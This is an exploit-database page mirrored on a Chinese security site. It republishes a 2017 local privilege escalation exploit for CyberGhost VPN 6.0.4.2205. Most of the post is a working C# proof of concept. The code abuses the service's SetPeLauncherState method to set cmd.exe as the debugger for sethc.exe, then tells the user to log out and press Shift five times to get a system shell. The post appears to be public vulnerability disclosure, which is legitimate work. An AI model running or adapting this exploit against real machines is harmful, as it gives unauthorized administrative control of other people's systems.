首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CyberGhost 6.0.4.2205 - Privilege Escalation
来源:https://security.szurek.pl/ 作者:Szurek 发布时间:2017-03-07  
# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
# Date: 06.03.2017
# Software Link: http://www.cyberghostvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
  
1. Description
 
`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.
 
https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html
 
2. Proof of Concept
 
using System;
using CyberGhost.Communication;
 
namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Conext ComBox 865-1058 - Denia
·WordPress Multiple Plugins - A
·FTPShell Client 6.53 - Buffer
·Deluge Web UI 1.3.13 - Cross-S
·Ektron 8.5 / 8.7 / 9.0 XSLT Tr
·OpenElec 6.0.3 / 7.0.1 Code Ex
·pfSense 2.3.2 Cross Site Reque
·Alienvault OSSIM / USM 5.3.0 A
·MikroTik Router Denial Of Serv
·Struts2 S2-045 Remote Command
·SysGauge 1.5.18 - Buffer Overf
·Azure Data Expert Ultimate 2.2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved